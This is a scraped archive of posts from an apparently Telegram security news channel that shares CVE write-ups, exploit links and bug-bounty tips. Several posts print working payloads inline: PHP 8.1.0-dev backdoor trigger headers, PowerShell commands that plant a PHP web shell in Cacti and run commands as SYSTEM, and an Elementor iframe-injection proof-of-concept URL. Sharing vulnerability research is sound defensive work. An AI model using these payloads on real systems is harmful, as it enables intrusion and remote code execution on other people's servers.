en
Feedback
996
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
Sani
996
💥 PHP 8.1.0-dev then try RCE & SQLi 🔴Try : User-Agentt: zerodiumsleep(5); 🔴Try : User-Agentt: zerodiumsystem('id'); ⛔#BugB
💥 PHP 8.1.0-dev then try RCE & SQLi 🔴Try : User-Agentt: zerodiumsleep(5); 🔴Try : User-Agentt: zerodiumsystem('id'); ⛔#BugBounty , #Hunting 📱@APTANALYSIS

Sani
996
📝CVE-2023-27470 : Deleting Your Way Into SYSTEM: Why Arbitrary File Deletion Vulnerabilities Matter ➡️Blog : https://www.man
📝CVE-2023-27470 : Deleting Your Way Into SYSTEM: Why Arbitrary File Deletion Vulnerabilities Matter ➡️Blog : https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities ⛔#LPE , #Windows , #Access , #Analysis 📱@APTANALYSIS

Sani
996
💰Account takeover for $3000 👍Link : https://doepichack.com/account-takeover-for-3000/ ⛔#BugBounty , #Hunting 📱@APTANALYSIS
💰Account takeover for $3000 👍Link : https://doepichack.com/account-takeover-for-3000/ ⛔#BugBounty , #Hunting 📱@APTANALYSIS

Sani
996
☝️AD Attack and Defense - Domain User HashDump Tracking ⚡️Blog : https://www.freebuf.com/articles/network/362363.html ⛔#Hash_
☝️AD Attack and Defense - Domain User HashDump Tracking ⚡️Blog : https://www.freebuf.com/articles/network/362363.html ⛔#Hash_dump , #Mimikatz , #ADSecurity 📱@APTANALYSIS

Sani
996
⭐️ CVE-2022-4953 : Elementor < 3.5.5 - Iframe Injection ✅Wp : https://wpscan.com/vulnerability/8273357e-f9e1-44bc-8082-8fa
⭐️ CVE-2022-4953 : Elementor < 3.5.5 - Iframe Injection ✅Wp : https://wpscan.com/vulnerability/8273357e-f9e1-44bc-8082-8faab838eda7 ✅EDB : https://www.exploit-db.com/exploits/51716
{
Proof of Concept :: 
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K 
}
⛔#Exploit , #EDB , #POC , #Vulnerability , #Elementor , #Hunting 📱@APTANALYSIS

Sani
996
🔥CVE-2023-31132 : Privilege escalation when Cacti &lt; 1.2.25 installed using Windows Installer defaults PS C:\Users\user1&g
🔥CVE-2023-31132 : Privilege escalation when Cacti < 1.2.25 installed using Windows Installer defaults
PS C:\Users\user1> echo '<?php system($_SERVER[''HTTP_X_CMD'']);?>' | Out-File -Encoding utf8 C:\Apache24\htdocs\cacti\webshell.php
——
PS C:\Users\user1> eNTER
——
PS C:\Users\user1> Invoke-WebRequest -UseBasicParsing -Headers @{'x-cmd'='whoami'} -Uri http://localhost/cacti/webshell.php | select -ExpandProperty  Content

|— nt authority\system 🟥Refrence : https://github.com/Cacti/cacti/security/advisories/GHSA-rf5w-pq3f-9876 ⛔#POC , #Exploit , #Cacti , #Vulnerability 📱@APTANALYSIS

Sani
996
🦋 Iran Ethical hackers 2016 🔵@APTIRAN

Sani
996
🔥🔥🔥Iran Ethical Hackers 2016 (Lab) 🦋 By : ALI 0P3N3R 🦋 Sp Thanks : Alireza 🐈‍⬛Vulnerability training Sql injection GET
🔥🔥🔥Iran Ethical Hackers 2016 (Lab) 🦋 By : ALI 0P3N3R 🦋 Sp Thanks : Alireza 🐈‍⬛Vulnerability training Sql injection GET method 🐈‍⬛Sql injection POST method vulnerability tutorial 🐈‍⬛Authentication bypass vulnerability training 🐈‍⬛SQL injection vulnerability in the user agent header 🐈‍⬛XSS vulnerability training of reflected type and get method 🐈‍⬛XSS vulnerability training of reflected type and post method 🐈‍⬛XSS vulnerability training of stored type and get method 🐈‍⬛Learning xss vulnerability of stored type and post method 🐈‍⬛Teaching the xss vulnerability in the user agent header, the first method 🐈‍⬛Teaching the xss vulnerability in the user agent header of the second method 🐈‍⬛Teaching xss vulnerability in http referrer header 🐈‍⬛Teaching the vulnerability of os command injection 🐈‍⬛SSI vulnerability training 🐈‍⬛SSTI Vulnerability Training 🐈‍⬛LFI vulnerability training 🐈‍⬛RFI Vulnerability Training 🐈‍⬛Unvalidated File Upload vulnerability training 🐈‍⬛Unvalidated redirects and forwards vulnerability training 🐈‍⬛Vulnerability training insecure direct object references 🐈‍⬛SSRF vulnerability training 🐈‍⬛CSRF Vulnerability Training 🐈‍⬛Training to bypass the addslashes function in sql injection attacks 🐈‍⬛Training to bypass addslashes in xss attacks 🐈‍⬛Learning to bypass the mysql_real_scape_string function in sql injection attacks 🐈‍⬛HTML injection vulnerability tutorial ⭐️Password : @APTIRAN 📱@APTANALYSIS

Sani
996
🖤There are 2 months left of 3 months of private channel subscription. ⚖️Note: Permanent membership users are included.

Sani
996
💥💥💥CVE-2023-4528: Java Deserialization Vulnerability in JSCAPE MFT (Fixed) ⚠️Java : https://www.rapid7.com/blog/post/2023/
💥💥💥CVE-2023-4528: Java Deserialization Vulnerability in JSCAPE MFT (Fixed) ⚠️Java : https://www.rapid7.com/blog/post/2023/09/07/cve-2023-4528-java-deserialization-vulnerability-in-jscape-mft-fixed/ Executing : java.lang.Runtime.getRuntime().exec("...shell command..."); 💥💥💥Metasploit Weekly Wrap-Up Metasploit : https://www.rapid7.com/blog/post/2023/09/01/metasploit-weekly-wrap-up-25/ CVE-2023-34468 : exploit/linux/http/apache_nifi_h2_rce (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_nifi_h2_rce.rb ⛔#Vulnerability_Disclosure , #Discovers , #Rapid7 , #Module , #Vulnerability , #Metasploit , #CVE , #Exploit 📱@APTANALYSIS

Sani
996
👑Qualys Top 20 Most Exploited Vulnerabilities The earlier blog posts showcased an overview of the vulnerability threat lands
👑Qualys Top 20 Most Exploited Vulnerabilities The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware. This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year. Some of these vulnerabilities are part of the recent CISA Joint Cybersecurity Advisory (CSA), published on August 3, 2023; you can access it from 2022 Top Routinely Exploited Vulnerabilities. 🔗Blog : https://blog.qualys.com/vulnerabilities-threat-research/2023/09/04/qualys-top-20-exploited-vulnerabilities ⛔#Vulnerability ,#CVE , #Top , #Exploited , #TOP_20_CVE 📱@APTANALYSIS

Sani
996
🔴Paranoids Vulnerability Research - Ivanti Issues Security Alert 💥CVE-2023-28323: Unsafe Deserialization Leading to RCE 💥C
🔴Paranoids Vulnerability Research - Ivanti Issues Security Alert 💥CVE-2023-28323: Unsafe Deserialization Leading to RCE 💥CVE-2023-28324: Insufficient Client Validation Leading to Privilege Escalation 💥CVE-2023-38343: XXE Leading to File Disclosure and SSRF 💥CVE-2023-38344: Authenticated Arbitrary File Read ⭐️Link : https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-ivanti-issues-security-alert ⛔#Alert , #POC , #Analysis , #Vulnerability ,#CVE 📱@APTANALYSIS

Sani
996
⚪️Boot Unguarded: x86 Trust Anchor Downfalls to The Leaked OEM Internal Tools and Signing Keys ⭐️Link : https://hardenedlinux
⚪️Boot Unguarded: x86 Trust Anchor Downfalls to The Leaked OEM Internal Tools and Signing Keys ⭐️Link : https://hardenedlinux.org/blog/2023-09-07-boot-unguarded-x86-trust-anchor-downfalls-to-the-leaked-oem-internal-tools-and-signing-keys/ ❤@APTANALYSIS

Sani
996
😏
😏

Sani
996
🟥Understanding Red to Be Better at Blue: Navigating New CrackMapExec Updates 🔸Blog : https://kostas-ts.medium.com/understan
🟥Understanding Red to Be Better at Blue: Navigating New CrackMapExec Updates 🔸Blog : https://kostas-ts.medium.com/understanding-red-to-be-better-at-blue-navigating-new-crackmapexec-updates-c27b46965578 ⛔#Detection_Engineering , #Information_Security , #Threat_Hunting , #PurpleTeaming , #RedTeam ❤@APTANALYSIS

Sani
996
😊CVE-2023-36812 , CVE-2023-25826 : OpenTSDB <= 2.4.1 - Command injection 🌙Exp : https://github.com/ErikWynter/opentsdb_key_cmd_injection ⛔#Exploit ❤@APTANALYSIS

Sani
996
🖥Numerous and instructive vulnerabilities 🔗CVE-2023-31465 - Reomote Command Execution in TimeKeeper v. 8.0.17-8.0.27 PoC 🔗
🖥Numerous and instructive vulnerabilities 🔗CVE-2023-31465 - Reomote Command Execution in TimeKeeper v. 8.0.17-8.0.27 PoC 🔗CVE-2023-31466 - Stored Cross-Site Scripting in TimeKeeper v. 8.0.17-8.0.27 PoC 🔗CVE-2023-39558 - Reflected Cross-Site Scripting in AudimexEE v.15.0 PoC 🔗CVE-2023-39559 - Full Path Disclosure in AudimexEE v15.0 PoC 🔗CVE-2023-41635 - XML External Entity injection in RealGimm by GruppoSCAI PoC 🔗CVE-2023-41636 - SQL injection in RealGimm by GruppoSCAI PoC 🔗CVE-2023-41637 - Stored cross-site scripting in RealGimm by GruppoSCAI PoC 🔗CVE-2023-41638 - RCE via Unrestricted file upload in RealGimm by GruppoSCAI PoC 🔗CVE-2023-41640 - Information disclosure in RealGimm by GruppoSCAI PoC 🔗CVE-2023-41642 - Reflected cross-site scripting in RealGimm by GruppoSCAI PoC ⛔#Exploit , #POC , #Analysis , #Vulnerability ,#CVE , #multiple ❤@APTANALYSIS

Sani
996
👩‍💻 Windows 12 web version, online experience Click on the link below to experience online 😍 Web : https://tjy-gitnub.gith
👩‍💻 Windows 12 web version, online experience Click on the link below to experience online 😍 Web : https://tjy-gitnub.github.io/win12/desktop.html ☕️ Repo : https://github.com/tjy-gitnub/win12 ⛔#Web_Tools , #Windows_12 ❤@APTANALYSIS

Sani
996
⭐️CVE-2023-38490 : Kirby &lt; 3.9.6 XML External Entity (XXE) ⭐️POC : https://github.com/Acceis/exploit-CVE-2023-38490 ➡️Blog
⭐️CVE-2023-38490 : Kirby < 3.9.6 XML External Entity (XXE) ⭐️POC : https://github.com/Acceis/exploit-CVE-2023-38490 ➡️Blog : https://www.acceis.fr/kirby-3-9-6-xml-external-entity-xxe-vulnerability-cve-2023-38490 ⛔#Exploit , #POC , #Analysis , #Vulnerability ❤@APTANALYSIS